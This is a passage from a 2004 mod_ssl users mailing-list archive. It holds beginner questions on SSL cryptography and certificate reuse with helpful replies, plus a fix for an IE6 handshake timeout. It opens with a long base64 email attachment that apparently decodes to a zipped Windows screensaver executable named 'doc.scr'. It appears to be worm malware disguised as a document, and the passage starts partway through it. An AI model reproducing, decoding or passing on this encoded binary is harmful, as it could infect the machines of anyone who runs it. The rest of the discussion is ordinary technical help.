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
Bw+3B0dQR7lXSPKuVf+WZLIAAAnAdAeJA4PDBOvY/5ZosgAAYemUgP//AAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAgADAAAAIAAAgA4AAABgAACAAAAAAAAAAAAAAAAAAAABAAEAAAA4AACAAAAAAAAA
AAAAAAAAAAABAAkEAABQAAAAqMAAACgBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAACgAACAeAAA
gAAAAAAAAAAAAAAAAAAAAQAJBAAAkAAAANTBAAAUAAAAAAAAAAAAAAABADAAsJAAACgAAAAQAAAA
IAAAAAEABAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAACAAAAAgIAAgAAAAIAAgACA
gAAAgICAAMDAwAAAAP8AAP8AAAD//wD/AAAA/wD/AP//AAD///8AAACIiIgAAAAACId3d3iAAAB4
//+Ih3AAAHj3j///eAAAeP////94AAB493d4/3gAAHj/////eAAAePd3eP94AAB4/////3gAAHj3
d4//eAAAeP////94AAB4/////3gAAHh/f39/eAAAh3OHh4eAAAAHszt7d4AAAAAAAACAAADwPwAA
4AcAAMAHAADAAwAAwAMAAMADAADAAwAAwAMAAMADAADAAwAAwAMAAMADAADAAwAAwAcAAOAHAAD/
3wAA2JEAAAAAAQABABAQEAABAAQAKAEAAAEAAAAAAAAAAAAAAAAAkMIAAGDCAAAAAAAAAAAAAAAA
AACdwgAAcMIAAAAAAAAAAAAAAAAAAKrCAAB4wgAAAAAAAAAAAAAAAAAAtcIAAIDCAAAAAAAAAAAA
AAAAAADAwgAAiMIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAysIAANjCAADowgAAAAAAAPbCAAAAAAAA
BMMAAAAAAAAMwwAAAAAAAHMAAIAAAAAAS0VSTkVMMzIuRExMAEFEVkFQSTMyLmRsbABNU1ZDUlQu
ZGxsAFVTRVIzMi5kbGwAV1MyXzMyLmRsbAAATG9hZExpYnJhcnlBAABHZXRQcm9jQWRkcmVzcwAA
RXhpdFByb2Nlc3MAAABSZWdDbG9zZUtleQAAAG1lbXNldAAAd3NwcmludGZBAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQSwECFAAK
AAAAAABcHEQwyicfngBYAAAAWAAABwAAAAAAAAAAACAAAAAAAAAAZG9jLnNjclBLBQYAAAAAAQAB
ADUAAAAlWAAAAAA=

------=_NextPart_000_0014_6FCB6AE7.8C4E1970--



From owner-modssl-users@modssl.org  Fri Feb  6 18:10:20 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 81E0CA8945; Fri,  6 Feb 2004 18:10:20 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smtp1.rsv.se (smtp1.rsv.se [137.61.237.10])
	by master.modssl.org (Postfix) with ESMTP id 58BD3A893A
	for ; Fri,  6 Feb 2004 18:10:07 +0100 (CET)
Received: from localhost (localhost [127.0.0.1])
	by smtp3.rsv.se (Postfix) with ESMTP id 60C8829E
	for ; Fri,  6 Feb 2004 18:10:06 +0100 (MET)
Date: Fri, 6 Feb 2004 18:09:45 +0100 (MET)
From: Ringaby Anders 
X-X-Sender:  
To: 
Subject: symmetric or asymmetric ?
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-Virus-Scanned: by amavisd-new at rsv.se
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ringaby Anders 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users



Hello !

I am one of many mod-ssl beginners, and I have two questions.


1. The modssl web site refers to the SSL cryptography algorithm
   as being conventional, or symmetric. But mod-ssl uses public
   and private keys, which are known as parts of asymmetric
   cryptography. Any explanation ?

2. I copied a mod-ssl-enhanced apache-2.0.48 installation to
   another machine, replaced the certificate file ( server.crt )
   with another certificate ( but same file name ), and made
   some small changes in httpd.conf and ssl.conf. Of course,
   this did not work. Is there any way that I can generate a
   new private key ( server.key file ) according to the
   public key in the new certificate file ? Or should I remove
   everything and install again, the proper way ?


Regards

Anders



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Feb  6 19:04:12 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 0EFD7A895E; Fri,  6 Feb 2004 19:04:11 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from enroque.rawbyte.com (adsl-63-192-218-231.dsl.snfc21.pacbell.net [63.192.218.231])
	by master.modssl.org (Postfix) with ESMTP id DA6E2A8947
	for ; Fri,  6 Feb 2004 19:03:58 +0100 (CET)
Received: by enroque.rawbyte.com (Postfix, from userid 501)
	id DA8523F5B0; Fri,  6 Feb 2004 09:35:54 -0800 (PST)
Date: Fri, 6 Feb 2004 09:35:54 -0800
From: Daniel Lopez 
To: modssl-users@modssl.org
Subject: Re: symmetric or asymmetric ?
Message-ID: <20040206173554.GA7462@rawbyte.com>
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
User-Agent: Mutt/1.3.28i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Daniel Lopez 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


> 1. The modssl web site refers to the SSL cryptography algorithm
>    as being conventional, or symmetric. But mod-ssl uses public
>    and private keys, which are known as parts of asymmetric
>    cryptography. Any explanation ?

Asymmetric cryptography is used to agree and exchange keys for symmetric
cryptography (much faster)

> 2. I copied a mod-ssl-enhanced apache-2.0.48 installation to
>    another machine, replaced the certificate file ( server.crt )
>    with another certificate ( but same file name ), and made
>    some small changes in httpd.conf and ssl.conf. Of course,
>    this did not work. Is there any way that I can generate a
>    new private key ( server.key file ) according to the
>    public key in the new certificate file ? Or should I remove
>    everything and install again, the proper way ?

"it did not work" does not tell us much :) Which errors did you get?
What did you change? What is the current conf?

Since you are just starting with mod_ssl, I suggest reinstalling from
scratch rather than trying to figure out what may be going wrong.
You can find detailed information on how SSL works (symm/asymm.,
certificates, etc.) and how to get Apache 2 + mod_ssl working on a chapter I
have online at 

http://www.apacheworld.org/ty24/site.chapter17.html


Cheers

Daniel

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Feb  6 21:26:53 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id A6569A8947; Fri,  6 Feb 2004 21:26:53 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cr.toftum.org (cpe.atm2-0-1021150.0x50a3cb26.arcnxx16.customer.tele.dk [80.163.203.38])
	by master.modssl.org (Postfix) with ESMTP id 2C822A8945
	for ; Fri,  6 Feb 2004 21:26:39 +0100 (CET)
Received: by cr.toftum.org (Postfix, from userid 1000)
	id 595A85E016E; Fri,  6 Feb 2004 21:26:40 +0100 (CET)
Date: Fri, 6 Feb 2004 21:26:40 +0100
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: symmetric or asymmetric ?
Message-ID: <20040206202640.GA1854@gw>
Mail-Followup-To: modssl-users@modssl.org
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Fri, Feb 06, 2004 at 06:09:45PM +0100, Ringaby Anders wrote:
> 
> 
> Hello !
> 
> I am one of many mod-ssl beginners, and I have two questions.
> 
> 
> 1. The modssl web site refers to the SSL cryptography algorithm
>    as being conventional, or symmetric. But mod-ssl uses public
>    and private keys, which are known as parts of asymmetric
>    cryptography. Any explanation ?
> 
mod_ssl uses both - if you want the details, read:
http://httpd.apache.org/docs-2.0/ssl/ssl_intro.html

> 2. I copied a mod-ssl-enhanced apache-2.0.48 installation to
>    another machine, replaced the certificate file ( server.crt )
>    with another certificate ( but same file name ), and made
>    some small changes in httpd.conf and ssl.conf. Of course,
>    this did not work. Is there any way that I can generate a
>    new private key ( server.key file ) according to the
>    public key in the new certificate file ? Or should I remove
>    everything and install again, the proper way ?
> 
There's nothing that should keep the keys from working on different
machines, so chances are that it is either the installation or the
configuration that failed.

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Feb  8 00:26:23 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 5E014A8945; Sun,  8 Feb 2004 00:26:23 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from leia.partnersmith.com (leia.partnersmith.com [216.206.190.6])
	by master.modssl.org (Postfix) with ESMTP id 700C3A893A
	for ; Sun,  8 Feb 2004 00:26:15 +0100 (CET)
Received: from sslcom.com (vt-williston-cuda1j2-5.sbtnvt.adelphia.net [69.162.181.5])
	by leia.partnersmith.com (8.12.10/8.12.10) with ESMTP id i17NQ9UJ011617;
	Sat, 7 Feb 2004 15:26:10 -0800 (PST)
Message-ID: <40257410.4000607@sslcom.com>
Date: Sat, 07 Feb 2004 18:26:08 -0500
From: R McIntosh 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040113
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Cc: openssl-users@openssl.org
Subject: Re: apache ssl handshake timeout on ie6 and windows 2000
References: <3FFB0179.6080707@sslcom.com>
In-Reply-To: <3FFB0179.6080707@sslcom.com>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: R McIntosh 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I believe I have found the solution.   Apparently, it was a bug 
introduced in SP1 and now fixed in SP4 for windows 2000:

    http://support.microsoft.com/default.aspx?kbid=305217

Thanks,
-R


R McIntosh wrote:

> Hello OpenSSL and ModSSL users,
>
> I am running apache-1.3.29, mod_ssl-2.8.16-1.3.29, and openssl 0.9.7c.
>
> Users at a specific lan on the internet accessing our cgi application 
> sometimes lock at some random place in our application.   Once this 
> happens, it will lock up again at the same page if the quit their 
> browser and try again.  They are running a patched ie6 on windows 
> 2000.   We only have this problem with this one client's site.
>
> Here is the error from my log file:
>
> [Tue Dec 30 08:19:10 2003] [error] mod_ssl: SSL handshake timed out 
> (client X.X.X.X, server www.partnersmith.com:443)
>
> The ssl-engine log has no additional information. 
> When the connection does work, it uses Protocol: SSLv3, Cipher: 
> RC4-MD5 (128/128 bits)
>
> I have the usual stuff for ie in my httpd.conf:
>
>   SetEnvIf User-Agent ".*MSIE.*" \
>         nokeepalive ssl-unclean-shutdown \
>         downgrade-1.0 force-response-1.0
>
> I have been researching this with no luck.   I have found hints of 
> people having this problem with w2k in the archives but never any 
> solution.
>
> Thank you for your time.
> -R
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Feb  8 03:56:03 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 2881CA8944; Sun,  8 Feb 2004 03:56:02 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mx1.rootauthority.us (adsl-66-123-229-170.dsl.sndg02.pacbell.net [66.123.229.170])
	by master.modssl.org (Postfix) with ESMTP id 28193A8995
	for ; Sun,  8 Feb 2004 03:55:54 +0100 (CET)
Received: by mx1.rootauthority.us (Postfix, from userid 0)
	id ED84BB817; Sat,  7 Feb 2004 18:55:47 -0800 (PST)
Received: from pop.cotse.com
	by localhost with POP3 (fetchmail-6.2.5)
	for __zma@localhost (single-drop); Sat, 07 Feb 2004 18:55:47 -0800 (PST)
Received: from mmx.engelschall.com (mmx.engelschall.com [195.27.130.252])
	by mailhost.cotse.com (5.7.4/5.7.4) with ESMTP id i182ZPuU035127
	for ; Sat, 7 Feb 2004 21:35:26 -0500 (EST)
	(envelope-from owner-mmx-openssl-users@mmx.engelschall.com)
Received: by mmx.engelschall.com (Postfix)
	id 5D6A219339; Sun,  8 Feb 2004 03:32:11 +0100 (CET)
Received: from master.openssl.org (master.openssl.org [195.27.176.155])
	by mmx.engelschall.com (Postfix) with ESMTP id 00DA719328
	for ; Sun,  8 Feb 2004 03:32:10 +0100 (CET)
Received: by master.openssl.org (Postfix)
	id 02EC5203EB8; Sun,  8 Feb 2004 03:32:11 +0100 (CET)
Delivered-To: openssl-users-l@master.openssl.org
Received: by master.openssl.org (Postfix, from userid 5003)
	id C6447203EBA; Sun,  8 Feb 2004 03:32:10 +0100 (CET)
X-Original-To: openssl-users@openssl.org
Delivered-To: openssl-users@openssl.org
Received: from leia.partnersmith.com (leia.partnersmith.com [216.206.190.6])
	by master.openssl.org (Postfix) with ESMTP id 4B237203E71
	for ; Sun,  8 Feb 2004 03:31:59 +0100 (CET)
Received: from sslcom.com (vt-williston-cuda1j2-5.sbtnvt.adelphia.net [69.162.181.5])
	by leia.partnersmith.com (8.12.10/8.12.10) with ESMTP id i17NQ9UJ011617;
	Sat, 7 Feb 2004 15:26:10 -0800 (PST)
Message-ID: <40257410.4000607@sslcom.com>
Date: Sat, 07 Feb 2004 18:26:08 -0500
From: R McIntosh 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040113
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Cc: openssl-users@openssl.org
Subject: Re: apache ssl handshake timeout on ie6 and windows 2000
References: <3FFB0179.6080707@sslcom.com>
In-Reply-To: <3FFB0179.6080707@sslcom.com>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
X-Sender: R McIntosh 
X-List-Manager: OpenSSL Majordomo [version 1.94.5]
X-List-Name: openssl-users
X-Cotse-Filters: Default delivery
X-UIDL: 5bA!!YKc"!"'`!!2;h"!
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: R McIntosh 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I believe I have found the solution.   Apparently, it was a bug 
introduced in SP1 and now fixed in SP4 for windows 2000:

    http://support.microsoft.com/default.aspx?kbid=305217

Thanks,
-R


R McIntosh wrote:

> Hello OpenSSL and ModSSL users,
>
> I am running apache-1.3.29, mod_ssl-2.8.16-1.3.29, and openssl 0.9.7c.
>
> Users at a specific lan on the internet accessing our cgi application 
> sometimes lock at some random place in our application.   Once this 
> happens, it will lock up again at the same page if the quit their 
> browser and try again.  They are running a patched ie6 on windows 
> 2000.   We only have this problem with this one client's site.
>
> Here is the error from my log file:
>
> [Tue Dec 30 08:19:10 2003] [error] mod_ssl: SSL handshake timed out 
> (client X.X.X.X, server www.partnersmith.com:443)
>
> The ssl-engine log has no additional information. 
> When the connection does work, it uses Protocol: SSLv3, Cipher: 
> RC4-MD5 (128/128 bits)
>
> I have the usual stuff for ie in my httpd.conf:
>
>   SetEnvIf User-Agent ".*MSIE.*" \
>         nokeepalive ssl-unclean-shutdown \
>         downgrade-1.0 force-response-1.0
>
> I have been researching this with no luck.   I have found hints of 
> people having this problem with w2k in the archives but never any 
> solution.
>
> Thank you for your time.
> -R
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
OpenSSL Project                                 http://www.openssl.org
User Support Mailing List                    openssl-users@openssl.org
Automated List Manager                           majordomo@openssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Feb  8 04:52:13 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E39FCA893F; Sun,  8 Feb 2004 04:52:12 +0100 (CET)
